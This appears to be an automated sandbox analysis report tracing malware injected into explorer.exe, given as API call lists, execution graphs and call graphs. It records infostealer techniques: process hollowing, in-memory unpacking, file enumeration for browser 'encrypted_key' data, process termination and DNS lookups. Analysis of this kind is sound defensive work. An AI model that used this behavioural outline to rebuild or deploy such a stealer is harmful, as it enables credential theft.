                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$lstrcat
                                                        • String ID: "encrypted_key":"
                                                        • API String ID: 493641738-877455259
                                                        • Opcode ID: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                        • Instruction ID: 9c6b67dcc6ef624df4736c2e561888b14e3c99406eaee6f665111c1420be8bfd
                                                        • Opcode Fuzzy Hash: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                        • Instruction Fuzzy Hash: 96E0222260AA682F83A9ABF52D44DCF3EA89F46210305407CF60193513DF938842C2A4
                                                        APIs
                                                          • Part of subcall function 000C6A81: memset.NTDLL ref: 000C6A9C
                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000EF2A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _aulldivmemset
                                                        • String ID: %llu$%llu
                                                        • API String ID: 714058258-4283164361
                                                        • Opcode ID: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                        • Instruction ID: 733d781762fd89a8af3b4d8a65a072e1762b99422687671c30c8df4c3b8d9cf5
                                                        • Opcode Fuzzy Hash: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                        • Instruction Fuzzy Hash: 7721D4726446566BC714AB64CC42FBFB759AF85730F04823DFA25A72C2DB219C118BE1
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,?), ref: 000D2174
                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 000D220E
                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 000D2241
                                                        • _allmul.NTDLL(000C2E26,00000000,?,?), ref: 000D2295
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _allmul
                                                        • String ID:
                                                        • API String ID: 4029198491-0
                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                        • Instruction ID: 7aecc024886d43b95e8348e28dd4becad428794acad02cf143f155fdb2df515e
                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                        • Instruction Fuzzy Hash: 64A18D70708701AFD724EF64C881A6EB7E6AFE8704F00482EF65587352EB71ED458B62
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcpymemset
                                                        • String ID:
                                                        • API String ID: 1297977491-0
                                                        • Opcode ID: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                        • Instruction ID: ce6f6b553f9ce9aef2f833e00a544f58f3f1023c0b2831fe884ef76c5f2cd507
                                                        • Opcode Fuzzy Hash: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                        • Instruction Fuzzy Hash: 5F818D716083149FC354DF28C885A6BBBE5EFD8704F54492EF88A87352E770E905CBA2
                                                        APIs
                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1475610065-0
                                                        • Opcode ID: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                        • Instruction ID: 7c96ee7986758746c435996a51eed7706ca130184434f2eb8f608aff7d92e415
                                                        • Opcode Fuzzy Hash: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                        • Instruction Fuzzy Hash: C7E09BA230061C2B472477AE5C94EFF76DCDBD95A53150039F904D3203EE669C0146B0

                                                        Execution Graph

                                                        Execution Coverage:9.3%
                                                        Dynamic/Decrypted Code Coverage:55.1%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:49
                                                        Total number of Limit Nodes:2
                                                        execution_graph 949 637f4 950 63804 949->950 955 6372c 950->955 952 63809 954 63817 952->954 959 622b4 952->959 956 6375a 955->956 957 63777 RegCreateKeyExW 956->957 958 637bc 957->958 958->952 960 622d6 959->960 961 622c8 CreateStreamOnHGlobal 959->961 960->954 961->960 981 6a1e0 982 6a1e6 981->982 985 6a298 982->985 990 6a29d 985->990 986 6a385 LoadLibraryA 986->990 988 6a3e0 VirtualProtect VirtualProtect 989 6a46e 988->989 989->989 990->986 990->988 991 6a248 990->991 992 6a1af 993 6a1bd 992->993 994 6a298 3 API calls 993->994 995 6a1cf 993->995 994->995 962 6a298 967 6a29d 962->967 963 6a385 LoadLibraryA 963->967 965 6a3e0 VirtualProtect VirtualProtect 966 6a46e 965->966 966->966 967->963 967->965 968 6a3d5 967->968 969 63608 974 63458 StrStrIW 969->974 971 6363b 972 63458 4 API calls 971->972 973 6365d 972->973 980 6348f 974->980 975 63523 RegOpenKeyExW 976 635ef 975->976 979 6354d 975->979 976->971 977 635b5 RegEnumKeyExW 978 635e4 RegCloseKey 977->978 977->979 978->976 979->977 980->975 996 63668 997 63458 4 API calls 996->997 998 6369b 997->998 999 63458 4 API calls 998->999 1000 636bd 999->1000 1001 6a1f9 1002 6a228 1001->1002 1004 6a248 1001->1004 1003 6a298 3 API calls 1002->1003 1003->1004

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00062E04 8 Function_00061B8C 0->8 42 Function_00061838 0->42 70 Function_00061860 0->70 1 Function_00061405 2 Function_00062700 10 Function_00062688 2->10 2->70 3 Function_00061000 4 Function_00061980 5 Function_0006B00C 6 Function_0006298C 7 Function_0006188C 7->42 8->42 9 Function_00063608 64 Function_00063458 9->64 10->42 11 Function_00062308 12 Function_00061508 13 Function_00062514 28 Function_000623A0 13->28 51 Function_0006234C 13->51 54 Function_00062354 13->54 71 Function_00062360 13->71 80 Function_000623F0 13->80 14 Function_00061B14 14->42 15 Function_00069912 16 Function_00069C92 17 Function_0006B192 18 Function_00061D10 18->42 83 Function_000618F8 18->83 19 Function_00062410 34 Function_000623AC 19->34 19->80 20 Function_00062610 20->42 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 63 Function_0006A25A 23->63 24 Function_00062498 24->34 47 Function_00062340 24->47 25 Function_000699A7 26 Function_000647A7 27 Function_00061822 29 Function_00061E20 29->4 29->7 29->18 29->42 46 Function_00061C40 29->46 61 Function_000618D0 29->61 68 Function_00061DE0 29->68 29->70 29->83 30 Function_000628A0 30->42 30->70 78 Function_00062774 30->78 31 Function_0006A1AF 31->23 32 Function_0006372C 32->42 32->70 33 Function_000622AC 35 Function_0006272C 36 Function_000630A8 36->2 36->10 36->35 36->36 36->70 82 Function_00062F7C 36->82 84 Function_00062AF8 36->84 37 Function_00069EB4 38 Function_000622B4 39 Function_000614B2 40 Function_00069930 41 Function_000638B0 41->41 41->42 55 Function_00061AD4 41->55 43 Function_00061938 44 Function_00062938 45 Function_00069FC2 48 Function_000629C0 48->10 49 Function_00062BC0 49->2 49->10 49->20 49->35 49->42 49->43 58 Function_00062A54 49->58 49->70 50 Function_000641CF 52 Function_00061A4C 53 Function_000636C8 53->14 66 Function_000621E4 53->66 53->70 74 Function_000618E8 53->74 56 Function_000614D4 57 Function_00061254 58->42 58->70 59 Function_00063254 59->6 59->10 59->35 59->36 59->42 59->44 59->70 60 Function_0006A055 62 Function_00069ADA 64->2 64->10 64->30 64->42 64->48 64->59 64->64 64->70 64->78 65 Function_000641D9 66->29 66->42 66->70 67 Function_0006A1E0 67->23 68->52 69 Function_00061560 70->55 72 Function_0006156C 73 Function_00062B6C 73->13 73->24 75 Function_000622E8 76 Function_00063668 76->64 77 Function_00061576 78->42 78->70 78->78 79 Function_000637F4 79->11 79->32 79->33 79->38 79->53 79->54 79->73 79->75 81 Function_00062570 79->81 80->34 81->28 81->42 81->54 82->0 82->49 82->58 82->70 85 Function_00062EF8 82->85 84->42 85->20 86 Function_00064178 87 Function_0006A1F9 87->23 88 Function_000614F9

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                        • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                        • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                        • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID:
                                                        • API String ID: 1332880857-0
                                                        • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                        • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                        • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                        • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 41 6a298-6a29b 42 6a2a5-6a2a9 41->42 43 6a2b5 42->43 44 6a2ab-6a2b3 42->44 45 6a2b7 43->45 46 6a29d-6a2a3 43->46 44->43 47 6a2ba-6a2c1 45->47 46->42 49 6a2c3-6a2cb 47->49 50 6a2cd 47->50 49->50 50->47 51 6a2cf-6a2d2 50->51 52 6a2e7-6a2f4 51->52 53 6a2d4-6a2e2 51->53 63 6a2f6-6a2f8 52->63 64 6a30e-6a31c call 6a25a 52->64 54 6a2e4-6a2e5 53->54 55 6a31e-6a339 53->55 54->52 57 6a36a-6a36d 55->57 58 6a372-6a379 57->58 59 6a36f-6a370 57->59 62 6a37f-6a383 58->62 61 6a351-6a355 59->61 65 6a357-6a35a 61->65 66 6a33b-6a33e 61->66 67 6a385-6a39e LoadLibraryA 62->67 68 6a3e0-6a3e9 62->68 69 6a2fb-6a302 63->69 64->42 65->58 70 6a35c-6a360 65->70 66->58 74 6a340 66->74 73 6a39f-6a3a6 67->73 71 6a3ec-6a3f5 68->71 90 6a304-6a30a 69->90 91 6a30c 69->91 75 6a341-6a345 70->75 76 6a362-6a369 70->76 77 6a3f7-6a3f9 71->77 78 6a41a-6a46a VirtualProtect * 2 71->78 73->62 80 6a3a8 73->80 74->75 75->61 81 6a347-6a349 75->81 76->57 83 6a40c-6a418 77->83 84 6a3fb-6a40a 77->84 85 6a46e-6a473 78->85 86 6a3b4-6a3bc 80->86 87 6a3aa-6a3b2 80->87 81->61 89 6a34b-6a34f 81->89 83->84 84->71 85->85 92 6a475-6a484 85->92 88 6a3be-6a3ca 86->88 87->88 95 6a3d5-6a3df 88->95 96 6a3cc-6a3d3 88->96 89->61 89->65 90->91 91->64 91->69 96->73
                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 0006A397
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                        • VirtualProtect.KERNELBASE ref: 0006A45F
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_69000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                        • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                        • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: ?
                                                        • API String ID: 2289755597-1684325040
                                                        • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                        • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                        • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                        • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                        • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                        • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                                        Execution Graph

                                                        Execution Coverage:15.3%
                                                        Dynamic/Decrypted Code Coverage:96.6%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:233
                                                        Total number of Limit Nodes:7
                                                        execution_graph 1119 826ac lstrlen 1120 826f3 1119->1120 1121 826c4 CryptBinaryToStringA 1119->1121 1121->1120 1122 826d7 1121->1122 1125 829b7 GetProcessHeap RtlAllocateHeap 1122->1125 1124 826e2 CryptBinaryToStringA 1124->1120 1125->1124 1126 8295c VirtualFree 898 8126e CreateFileW 899 816fb Sleep 898->899 900 8129e GetFileSize 898->900 901 816f3 CloseHandle 900->901 902 812b6 900->902 901->899 902->901 916 829b7 GetProcessHeap RtlAllocateHeap 902->916 904 812cd 905 812db ReadFile 904->905 906 816f2 904->906 910 812fe 905->910 906->901 907 816eb 917 82999 907->917 908 81329 SetFilePointer 908->907 914 81351 908->914 910->907 910->908 911 81374 RtlMoveMemory 911->914 912 813a3 ReadFile 912->914 913 81c39 26 API calls 913->914 914->907 914->911 914->912 914->913 915 81972 29 API calls 914->915 915->914 916->904 922 827e2 VirtualQuery 917->922 920 829b5 920->906 921 829a5 GetProcessHeap HeapFree 921->920 923 827f9 922->923 923->920 923->921 924 8118f 925 81192 924->925 932 8255c 925->932 928 8255c 16 API calls 929 811b9 928->929 930 8255c 16 API calls 929->930 931 811c6 930->931 947 829b7 GetProcessHeap RtlAllocateHeap 932->947 934 8257a lstrcatW PathAppendW 935 8265d 934->935 936 825a2 FindFirstFileW 934->936 938 82999 3 API calls 935->938 936->935 937 825b9 936->937 939 825bd RtlZeroMemory 937->939 941 8263e FindNextFileW 937->941 942 8260f lstrcatW PathAppendW 937->942 945 825df lstrcatW PathAppendW 937->945 946 8255c 5 API calls 937->946 940 811ac 938->940 939->937 940->928 941->939 944 82652 FindClose 941->944 942->941 943 82627 StrStrIW 942->943 943->937 943->941 944->935 945->937 945->941 946->937 947->934 948 81000 949 81010 948->949 950 81007 948->950 952 81016 950->952 953 827e2 VirtualQuery 952->953 954 8101e 953->954 955 81022 954->955 960 829b7 GetProcessHeap RtlAllocateHeap 954->960 955->949 957 8102e RtlMoveMemory NtUnmapViewOfSection 961 8104f 957->961 960->957 1000 829b7 GetProcessHeap RtlAllocateHeap 961->1000 963 8105c 1001 829b7 GetProcessHeap RtlAllocateHeap 963->1001 965 8106b ExpandEnvironmentStringsW 966 8108c ExpandEnvironmentStringsW 965->966 967 81085 965->967 969 81099 966->969 970 810a0 ExpandEnvironmentStringsW 966->970 1002 8123a 967->1002 971 8123a 24 API calls 969->971 972 810ad 970->972 973 810b4 SHGetSpecialFolderPathW 970->973 971->970 974 8123a 24 API calls 972->974 975 810cc ExpandEnvironmentStringsW 973->975 976 810c5 973->976 974->973 978 810d9 975->978 979 810e0 ExpandEnvironmentStringsW 975->979 977 8123a 24 API calls 976->977 977->975 1009 811cc 978->1009 981 810ed 979->981 982 810f4 ExpandEnvironmentStringsW 979->982 1024 81192 981->1024 984 81108 ExpandEnvironmentStringsW 982->984 985 81101 982->985 987 8111c ExpandEnvironmentStringsW 984->987 988 81115 984->988 986 81192 16 API calls 985->986 986->984 990 81129 987->990 991 81130 987->991 989 81192 16 API calls 988->989 989->987 993 81192 16 API calls 990->993 992 82999 3 API calls 991->992 994 81137 992->994 993->991 995 81187 ExitProcess 994->995 1031 829b7 GetProcessHeap RtlAllocateHeap 994->1031 997 8114e 998 8117f 997->998 999 81158 wsprintfA 997->999 998->995 999->998 999->999 1000->963 1001->965 1032 8274a CreateToolhelp32Snapshot 1002->1032 1005 8255c 16 API calls 1006 8125b 1005->1006 1007 8255c 16 API calls 1006->1007 1008 81268 1007->1008 1008->966 1010 8255c 16 API calls 1009->1010 1011 811e6 1010->1011 1012 8255c 16 API calls 1011->1012 1013 811f3 1012->1013 1014 8255c 16 API calls 1013->1014 1015 81200 1014->1015 1016 8255c 16 API calls 1015->1016 1017 8120d 1016->1017 1018 8255c 16 API calls 1017->1018 1019 8121a 1018->1019 1020 8255c 16 API calls 1019->1020 1021 81227 1020->1021 1022 8255c 16 API calls 1021->1022 1023 81234 1022->1023 1023->979 1025 8255c 16 API calls 1024->1025 1026 811ac 1025->1026 1027 8255c 16 API calls 1026->1027 1028 811b9 1027->1028 1029 8255c 16 API calls 1028->1029 1030 811c6 1029->1030 1030->982 1031->997 1033 81249 1032->1033 1034 82765 Process32First 1032->1034 1033->1005 1035 827ae 1034->1035 1036 8277f lstrcmpi 1035->1036 1037 827b2 CloseHandle 1035->1037 1038 827a0 Process32Next 1036->1038 1039 82795 1036->1039 1037->1033 1038->1035 1041 827be OpenProcess 1039->1041 1042 827e0 1041->1042 1043 827d0 TerminateProcess CloseHandle 1041->1043 1042->1038 1043->1042 1048 82013 1049 82029 lstrlen 1048->1049 1050 82036 1048->1050 1049->1050 1059 829b7 GetProcessHeap RtlAllocateHeap 1050->1059 1052 8203e lstrcat 1053 8207a 1052->1053 1054 82073 lstrcat 1052->1054 1060 820a7 1053->1060 1054->1053 1057 82999 3 API calls 1058 8209d 1057->1058 1059->1052 1094 82415 1060->1094 1064 820d4 1099 82938 lstrlen MultiByteToWideChar 1064->1099 1066 820e3 1100 824cc RtlZeroMemory 1066->1100 1069 82135 RtlZeroMemory 1071 8216a 1069->1071 1070 82999 3 API calls 1072 8208a 1070->1072 1073 823f7 1071->1073 1077 82198 1071->1077 1102 8243d 1071->1102 1072->1057 1073->1070 1075 823dd 1075->1073 1076 82999 3 API calls 1075->1076 1076->1073 1077->1075 1111 829b7 GetProcessHeap RtlAllocateHeap 1077->1111 1079 82268 wsprintfW 1080 8228e 1079->1080 1084 822fb 1080->1084 1112 829b7 GetProcessHeap RtlAllocateHeap 1080->1112 1082 822c8 wsprintfW 1082->1084 1083 823ba 1085 82999 3 API calls 1083->1085 1084->1083 1113 829b7 GetProcessHeap RtlAllocateHeap 1084->1113 1087 823ce 1085->1087 1087->1075 1088 82999 3 API calls 1087->1088 1088->1075 1089 82346 1090 823b3 1089->1090 1114 8296b VirtualAlloc 1089->1114 1091 82999 3 API calls 1090->1091 1091->1083 1093 823a0 RtlMoveMemory 1093->1090 1095 820c6 1094->1095 1096 8241f 1094->1096 1098 829b7 GetProcessHeap RtlAllocateHeap 1095->1098 1115 82818 lstrlen lstrlen 1096->1115 1098->1064 1099->1066 1101 820f3 1100->1101 1101->1069 1101->1073 1103 824ab 1102->1103 1105 8244a 1102->1105 1103->1077 1104 8244e DnsQuery_W 1104->1105 1105->1103 1105->1104 1106 8248d DnsFree inet_ntoa 1105->1106 1106->1105 1107 824ad 1106->1107 1117 829b7 GetProcessHeap RtlAllocateHeap 1107->1117 1109 824b7 1118 82938 lstrlen MultiByteToWideChar 1109->1118 1111->1079 1112->1082 1113->1089 1114->1093 1116 82839 1115->1116 1116->1095 1117->1109 1118->1103 1044 89d24 1045 89caf 1044->1045 1046 89f00 VirtualProtect VirtualProtect 1045->1046 1047 89ec9 1045->1047 1046->1047 1047->1047 1127 818f4 CreateFileW 1128 81919 GetFileSize 1127->1128 1129 8196d 1127->1129 1130 81929 1128->1130 1131 81965 CloseHandle 1128->1131 1130->1131 1141 829b7 GetProcessHeap RtlAllocateHeap 1130->1141 1131->1129 1133 81936 ReadFile 1134 8194b 1133->1134 1135 8195d 1133->1135 1142 81c39 1134->1142 1136 82999 3 API calls 1135->1136 1138 81964 1136->1138 1138->1131 1141->1133 1155 829b7 GetProcessHeap RtlAllocateHeap 1142->1155 1144 81c50 RtlMoveMemory 1145 81e36 1144->1145 1149 81c65 1144->1149 1147 81db2 RtlMoveMemory RtlZeroMemory StrStrIA 1148 81deb StrStrIA 1147->1148 1147->1149 1148->1149 1150 81df7 StrStrIA 1148->1150 1149->1145 1151 82999 3 API calls 1149->1151 1156 829b7 GetProcessHeap RtlAllocateHeap 1149->1156 1157 81e44 1149->1157 1150->1149 1152 81e03 StrStrIA 1150->1152 1151->1149 1152->1149 1153 81e0f StrStrIA 1152->1153 1153->1149 1155->1144 1156->1147 1158 81e5b lstrlen CharLowerBuffA 1157->1158 1163 81ec7 1157->1163 1159 81e75 1158->1159 1161 81e9d 1158->1161 1160 81e7f lstrcmpi 1159->1160 1159->1161 1160->1159 1160->1163 1161->1163 1166 81ece StrStrIA 1161->1166 1163->1149 1165 82692 lstrlen RtlMoveMemory 1165->1163 1167 81ef5 RtlMoveMemory RtlMoveMemory StrStrIA 1166->1167 1168 81eb3 1166->1168 1167->1168 1169 81f37 StrStrIA 1167->1169 1168->1163 1168->1165 1169->1168 1170 81f4a StrStrIA 1169->1170 1170->1168 1171 81f5d lstrlen 1170->1171 1171->1168 1172 81f6a 1171->1172 1172->1168 1173 81f9b lstrlen 1172->1173 1173->1168 1173->1172 1174 89cf6 1176 89caf 1174->1176 1175 89ec9 1175->1175 1176->1174 1176->1175 1177 89f00 VirtualProtect VirtualProtect 1176->1177 1177->1175

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00088F09 1 Function_0008170B 2 Function_0008490B 3 Function_0008380C 4 Function_00089B0E 5 Function_0008560F 6 Function_00081000 12 Function_00081016 6->12 7 Function_00082818 8 Function_00081810 9 Function_00084A10 10 Function_00082013 70 Function_00082999 10->70 82 Function_000820A7 10->82 88 Function_000829B7 10->88 11 Function_00082415 11->7 35 Function_0008104F 12->35 12->88 106 Function_000827E2 12->106 13 Function_00088816 14 Function_00088F16 15 Function_00082917 16 Function_00089028 17 Function_0008892B 18 Function_00088E2C 19 Function_0008992D 20 Function_00089420 21 Function_00082723 22 Function_00089823 23 Function_00089D24 24 Function_00082938 25 Function_00081C39 39 Function_00081E44 25->39 25->70 25->88 110 Function_00081FFB 25->110 26 Function_0008123A 32 Function_0008274A 26->32 42 Function_0008255C 26->42 27 Function_0008493B 28 Function_0008243D 28->24 28->88 29 Function_0008373E 30 Function_00089635 31 Function_00088F36 85 Function_000827BE 32->85 33 Function_00088B4C 34 Function_0008374D 35->26 35->70 72 Function_00081192 35->72 35->88 91 Function_000811CC 35->91 36 Function_00088F40 37 Function_00089040 38 Function_00089543 92 Function_00081ECE 39->92 111 Function_000826FC 39->111 40 Function_00088D46 41 Function_00083547 42->21 42->42 42->70 42->88 43 Function_0008295C 44 Function_0008185C 45 Function_0008875C 46 Function_00088A5F 47 Function_00088A50 48 Function_00088D52 49 Function_00088756 50 Function_00089456 51 Function_00089057 52 Function_00089169 53 Function_0008296B 54 Function_0008126E 54->1 54->8 54->25 54->44 64 Function_00081972 54->64 54->70 54->88 102 Function_000818EA 54->102 55 Function_0008946E 56 Function_00088961 57 Function_00088D61 58 Function_00088862 59 Function_00088B62 60 Function_00083565 61 Function_00082866 62 Function_00084A7A 63 Function_0008967E 64->15 64->39 64->70 64->88 64->110 65 Function_00088E77 66 Function_0008118F 66->42 67 Function_00088681 68 Function_00089182 69 Function_00083685 70->106 71 Function_0008949B 72->42 73 Function_000892AB 74 Function_000826AC 74->88 75 Function_000890AD 76 Function_000838AE 77 Function_000889AE 78 Function_000886A0 79 Function_00088EA4 80 Function_000891A5 81 Function_000834A6 82->11 82->24 82->28 82->53 82->61 82->70 82->88 90 Function_000824CC 82->90 83 Function_000838A7 84 Function_000899B8 86 Function_000886BE 87 Function_000887B5 89 Function_000895B7 91->42 92->110 93 Function_000888CE 94 Function_00088FC0 95 Function_000896C2 96 Function_00088DDB 97 Function_000854DC 98 Function_000848D6 99 Function_00084CD6 100 Function_00088ED6 101 Function_000897E8 103 Function_000887EB 104 Function_000836E0 105 Function_000887E1 107 Function_000890E5 108 Function_000894E6 109 Function_00088DF9 112 Function_000896FC 113 Function_00088AFD 114 Function_00088CFE 115 Function_00084AF0 116 Function_000835F2 117 Function_000818F4 117->25 117->64 117->70 117->88 118 Function_000848F4 119 Function_00088CF5 120 Function_00089CF6

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • lstrcatW.KERNEL32(00000000), ref: 00082588
                                                        • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                                        • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                                        • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                                        • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                                        • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                                        • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                                        • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
